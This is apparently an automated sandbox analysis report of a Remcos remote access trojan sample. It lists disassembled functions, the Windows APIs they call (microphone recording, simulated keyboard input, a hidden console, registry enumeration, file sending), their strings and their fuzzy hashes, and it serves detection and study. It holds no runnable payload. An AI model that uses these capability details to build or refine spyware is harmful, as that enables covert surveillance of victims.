                                                                                • Instruction Fuzzy Hash: 682129329005249BCB14FB6AD8429DE77A9DF48324F21416FF404E72D1DFB9AD818B9D
                                                                                Function 00401BE9 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 71COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                                                                                • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000), ref: 00401C8F
                                                                                • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                                                                                • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                                                                                • waveInStart.WINMM ref: 00401CFE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                                • String ID: dMG$p54$|MG
                                                                                • API String ID: 1356121797-346803825
                                                                                • Opcode ID: e77b4b4e4653ae7db2ffa9ad3e4c491b15162175c47f56b782ba1ea702525e8d
                                                                                • Instruction ID: 1e392cdedf79dd274444ae0cc0b76d6cc185fd36309c60cea9b16e967c73269b
                                                                                • Opcode Fuzzy Hash: e77b4b4e4653ae7db2ffa9ad3e4c491b15162175c47f56b782ba1ea702525e8d
                                                                                • Instruction Fuzzy Hash: 51212A71604201AFC7399F66EE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                                                                                Function 0041D4EE Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48windowstringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D507
                                                                                  • Part of subcall function 0041D5A0: RegisterClassExA.USER32 ref: 0041D5EC
                                                                                  • Part of subcall function 0041D5A0: CreateWindowExA.USER32 ref: 0041D607
                                                                                  • Part of subcall function 0041D5A0: GetLastError.KERNEL32 ref: 0041D611
                                                                                • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D53E
                                                                                • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D558
                                                                                • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D56E
                                                                                • TranslateMessage.USER32(?), ref: 0041D57A
                                                                                • DispatchMessageA.USER32 ref: 0041D584
                                                                                • GetMessageA.USER32 ref: 0041D591
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                                • String ID: Remcos
                                                                                • API String ID: 1970332568-165870891
                                                                                • Opcode ID: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                                                                                • Instruction ID: 0a96d410cd687733bc2db9baaca44b2a156926270a6f860d3af68fdb0bcdced8
                                                                                • Opcode Fuzzy Hash: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                                                                                • Instruction Fuzzy Hash: CA0152B1840244EBD7109FA5EC4CFABBB7CEBC5705F00406AF515931A1D778D885CB58
                                                                                Function 0044CE00 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ed6e8dde3cdd9862c5be3ded71a2773307dc59359bf90b76219a4653831d67c7
                                                                                • Instruction ID: c312da418a410335279f0cc1971bad4557be7deeadefc114a47e367d78dfde09
                                                                                • Opcode Fuzzy Hash: ed6e8dde3cdd9862c5be3ded71a2773307dc59359bf90b76219a4653831d67c7
                                                                                • Instruction Fuzzy Hash: 94C1FA70D04249AFEF11DFA8CC41BAE7BB0AF09304F19415AE915A7392C77C9941CB69
                                                                                Function 00453E03 Relevance: 13.8, APIs: 9, Instructions: 268COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,004540DC,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453EAF
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F32
                                                                                • __alloca_probe_16.LIBCMT ref: 00453F6A
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,004540DC,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FC5
                                                                                • __alloca_probe_16.LIBCMT ref: 00454014
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FDC
                                                                                  • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00454058
                                                                                • __freea.LIBCMT ref: 00454083
                                                                                • __freea.LIBCMT ref: 0045408F
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                                                • String ID:
                                                                                • API String ID: 201697637-0
                                                                                • Opcode ID: d666079201eac34123aff993431e960db56ae36dfd708acf9a18ada5241d4519
                                                                                • Instruction ID: 957693029e8655488503f3238c5b69ab87e72ad781d0cd1ca1c521277c14990f
                                                                                • Opcode Fuzzy Hash: d666079201eac34123aff993431e960db56ae36dfd708acf9a18ada5241d4519
                                                                                • Instruction Fuzzy Hash: 2B91D472E002069BDB208E65C846EEFBBF59F49756F14051BED00EB282D73DCD898769
                                                                                Function 004451FA Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                • _memcmp.LIBVCRUNTIME ref: 004454A4
                                                                                • _free.LIBCMT ref: 00445515
                                                                                • _free.LIBCMT ref: 0044552E
                                                                                • _free.LIBCMT ref: 00445560
                                                                                • _free.LIBCMT ref: 00445569
                                                                                • _free.LIBCMT ref: 00445575
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$ErrorLast$_abort_memcmp
                                                                                • String ID: C
                                                                                • API String ID: 1679612858-1037565863
                                                                                • Opcode ID: 270cf3bb6288f401d2b81aec4bec5e705b2579f2f1b63f3c4bd6d63e951100ee
                                                                                • Instruction ID: c5fa7cd4a0def74fccfc383a36f0c71fd12082b8797d706f49daa7c6421ebafc
                                                                                • Opcode Fuzzy Hash: 270cf3bb6288f401d2b81aec4bec5e705b2579f2f1b63f3c4bd6d63e951100ee
                                                                                • Instruction Fuzzy Hash: D4B13775A016199FEB24DF18C885BAEB7B4FF48304F5085EAE809A7351E774AE90CF44
                                                                                Function 00414945 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 225COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: tcp$udp
                                                                                • API String ID: 0-3725065008
                                                                                • Opcode ID: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                                                                • Instruction ID: 4fb2fbaa1818e082f2863e0a7c91e4ace7fe62ed23b491eff3584b955907a2f3
                                                                                • Opcode Fuzzy Hash: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                                                                • Instruction Fuzzy Hash: FC7197706083028FDB248F55D4817ABB7E4AFC8355F20482FF88697351E778DE858B9A
                                                                                Function 0040186A Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 142threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __Init_thread_footer.LIBCMT ref: 004018BE
                                                                                • ExitThread.KERNEL32 ref: 004018F6
                                                                                • waveInUnprepareHeader.WINMM(?,00000020,00000000), ref: 00401A04
                                                                                  • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                                                • String ID: PkG$XMG$NG$NG
                                                                                • API String ID: 1649129571-3151166067
                                                                                • Opcode ID: 8706ddbe36d9a0f1e6bf25ec99417fc645fb4de6b160676aa5446362c8e4167c
                                                                                • Instruction ID: 94ec9d015e3317cd6a1a8c0f3f0e5257b1b149af30ff9c9aaa6ade548e88cebb
                                                                                • Opcode Fuzzy Hash: 8706ddbe36d9a0f1e6bf25ec99417fc645fb4de6b160676aa5446362c8e4167c
                                                                                • Instruction Fuzzy Hash: 7441D5312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D4AC71D
                                                                                Function 0040799E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000), ref: 00407A00
                                                                                • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000), ref: 00407A48
                                                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00407A88
                                                                                • MoveFileW.KERNEL32 ref: 00407AA5
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00407AD0
                                                                                • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AE0
                                                                                  • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(00000000,000000FF,?,00474EF8,00404C49,00000000,00000000,00000000,?,00474EF8,?), ref: 00404BA5
                                                                                  • Part of subcall function 00404B96: SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                                • String ID: .part
                                                                                • API String ID: 1303771098-3499674018
                                                                                • Opcode ID: f8f352d1944775a3033a6e3b226fb99e3d0dc97036554631b9c7d83676d303e1
                                                                                • Instruction ID: fa021c15c5d1e87e569c09a19ead990ccf19330fc060556597d24b4305e87d8f
                                                                                • Opcode Fuzzy Hash: f8f352d1944775a3033a6e3b226fb99e3d0dc97036554631b9c7d83676d303e1
                                                                                • Instruction Fuzzy Hash: 3A31B571508345AFC310EB61D84599FB3A8FF94359F00493FB945A21D2EB78EE08CB9A
                                                                                Function 0041B71B Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 91COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00413656: RegOpenKeyExW.ADVAPI32 ref: 00413678
                                                                                  • Part of subcall function 00413656: RegQueryValueExW.ADVAPI32(?,0040F34E,00000000,00000000,?,00000400), ref: 00413697
                                                                                  • Part of subcall function 00413656: RegCloseKey.ADVAPI32(?), ref: 004136A0
                                                                                  • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                                                  • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                                                                                • _wcslen.LIBCMT ref: 0041B7F4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
                                                                                • String ID: .exe$8SG$http\shell\open\command$p54$program files (x86)\$program files\
                                                                                • API String ID: 3286818993-2881460799
                                                                                • Opcode ID: 426cf9f555deb71152b4ea0aff0bdf5362cc4b7c5296926717e194012261492b
                                                                                • Instruction ID: 00334f857bbe6022557327a28fa8f115e820bd32ca6b34e50ab8c41aa79dd428
                                                                                • Opcode Fuzzy Hash: 426cf9f555deb71152b4ea0aff0bdf5362cc4b7c5296926717e194012261492b
                                                                                • Instruction Fuzzy Hash: 42218872A001046BDB14BAB59CD6AFE766D9B48728F10043FF505B72C3EE3C9D49426D
                                                                                Function 0041CE2C Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 48memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • AllocConsole.KERNEL32 ref: 0041CE35
                                                                                • GetConsoleWindow.KERNEL32 ref: 0041CE3B
                                                                                • ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                                                                • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Console$Window$AllocOutputShow
                                                                                • String ID: Remcos v$5.1.1 Pro$CONOUT$
                                                                                • API String ID: 4067487056-3820604032
                                                                                • Opcode ID: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                                                                                • Instruction ID: 6efa3de70d430de9448838496adf33c47162c0890a3ad1875f095e209401f165
                                                                                • Opcode Fuzzy Hash: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                                                                                • Instruction Fuzzy Hash: A90144B1A80304BBD610F7F19C8BF9E77AC9B14B05F500527BA04A70D2EB6DD944466E
                                                                                Function 0040729B Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 40COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Rmc-4CT19T$p54$34
                                                                                • API String ID: 0-147987875
                                                                                • Opcode ID: 9875d9faf70918787a925bf8ffd0fe05ff0f1e0d4d07a7049234b56cd1ae4be9
                                                                                • Instruction ID: 5ffff352cfcc2e87221e4fa572a01d73507d198e899e6baa5594ec663d9dd15d
                                                                                • Opcode Fuzzy Hash: 9875d9faf70918787a925bf8ffd0fe05ff0f1e0d4d07a7049234b56cd1ae4be9
                                                                                • Instruction Fuzzy Hash: 8DF02BB0E04600EBCB1477345D296AA3656A780397F40487BF507EB2F2EBBD5C41871E
                                                                                Function 004199DB Relevance: 12.1, APIs: 8, Instructions: 117keyboardCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendInput.USER32 ref: 00419A25
                                                                                • SendInput.USER32(00000001,?,0000001C), ref: 00419A4D
                                                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A74
                                                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A92
                                                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AB2
                                                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AD7
                                                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AF9
                                                                                • SendInput.USER32(00000001,00000000,0000001C), ref: 00419B1C
                                                                                  • Part of subcall function 004199CE: MapVirtualKeyA.USER32 ref: 004199D4
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: InputSend$Virtual
                                                                                • String ID:
                                                                                • API String ID: 1167301434-0
                                                                                • Opcode ID: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                                                                • Instruction ID: b6cba15de7ba168fc32b54cb564de1fb898aed6d56f2455a0f9f7e0387a20004
                                                                                • Opcode Fuzzy Hash: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                                                                • Instruction Fuzzy Hash: 2431AE71218349A9E220DFA5DC41BDFBBECAF89B44F04080FF58457291CAA49D8C876B
                                                                                Function 004475F1 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 389COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: __freea$__alloca_probe_16_free
                                                                                • String ID: a/p$am/pm$h{D
                                                                                • API String ID: 2936374016-2303565833
                                                                                • Opcode ID: 3f6e07506486b6d7dbef2a606a64f0e75de21b8703f606ba4f5b284e1050ed44
                                                                                • Instruction ID: c225e1f32c331ede1d29eb10815d0f52c76e58365e66366979e06629ded2ae5c
                                                                                • Opcode Fuzzy Hash: 3f6e07506486b6d7dbef2a606a64f0e75de21b8703f606ba4f5b284e1050ed44
                                                                                • Instruction Fuzzy Hash: 94D1E1719082068AFB299F68C845ABFB7B1EF05300F28455BE501AB351D73D9E43CBA9
                                                                                Function 00444D7C Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                • _free.LIBCMT ref: 00444E87
                                                                                • _free.LIBCMT ref: 00444E9E
                                                                                • _free.LIBCMT ref: 00444EBD
                                                                                • _free.LIBCMT ref: 00444ED8
                                                                                • _free.LIBCMT ref: 00444EEF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$AllocateHeap
                                                                                • String ID: KED
                                                                                • API String ID: 3033488037-2133951994
                                                                                • Opcode ID: dfa49ca82d32c8382211b9fb73ae343eb5cb7a7eabed5eea37687c7cf3770045
                                                                                • Instruction ID: 6eb5fd97c930506827bd935ec23fdf2bd7e2f8155051dcdfd38a61b70e77380a
                                                                                • Opcode Fuzzy Hash: dfa49ca82d32c8382211b9fb73ae343eb5cb7a7eabed5eea37687c7cf3770045
                                                                                • Instruction Fuzzy Hash: 2351B371A00604ABEB20DF29CC42B6B77F4FF89724B25456EE809D7751E739E901CB98
                                                                                Function 00413A90 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 179registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413B26
                                                                                • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710), ref: 00413BC6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Enum$InfoQueryValue
                                                                                • String ID: [regsplt]$xUG$TG
                                                                                • API String ID: 3554306468-1165877943
                                                                                • Opcode ID: 4b0e642b2c48494caa08e7f7a3ba59522f0f548a4503128eeb0998b2f931d829
                                                                                • Instruction ID: 25111a67c66830bda9a991cbd11294aa9b1843c944dfd5f4caafe5fa1545c2ae
                                                                                • Opcode Fuzzy Hash: 4b0e642b2c48494caa08e7f7a3ba59522f0f548a4503128eeb0998b2f931d829
                                                                                • Instruction Fuzzy Hash: 05512D71900219AADB11EB95DC86EEEB77DAF04305F10007AE505B6191EF746B48CBA9
                                                                                Function 0044B43C Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetConsoleCP.KERNEL32 ref: 0044B47E
                                                                                • __fassign.LIBCMT ref: 0044B4F9
                                                                                • __fassign.LIBCMT ref: 0044B514
                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B53A
                                                                                • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BBB1,00000000), ref: 0044B559
                                                                                • WriteFile.KERNEL32(?,?,00000001,0044BBB1,00000000), ref: 0044B592
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                • String ID:
                                                                                • API String ID: 1324828854-0
                                                                                • Opcode ID: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                                                                • Instruction ID: 262f0c9efa3d8d05c94b564727faad167cb6e35c827a04fe4b8fb241bd644287
                                                                                • Opcode Fuzzy Hash: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                                                                • Instruction Fuzzy Hash: 2151B470A00249AFDB10CFA8D845AEEFBF8EF09304F14456BE955E7291E734D941CBA9
                                                                                Function 10009492 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetConsoleCP.KERNEL32 ref: 100094D4
                                                                                • __fassign.LIBCMT ref: 1000954F
                                                                                • __fassign.LIBCMT ref: 1000956A
                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 10009590
                                                                                • WriteFile.KERNEL32(?,?,00000000,10009C07,00000000), ref: 100095AF
                                                                                • WriteFile.KERNEL32(?,?,00000001,10009C07,00000000), ref: 100095E8
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1042274200.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1042264096.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
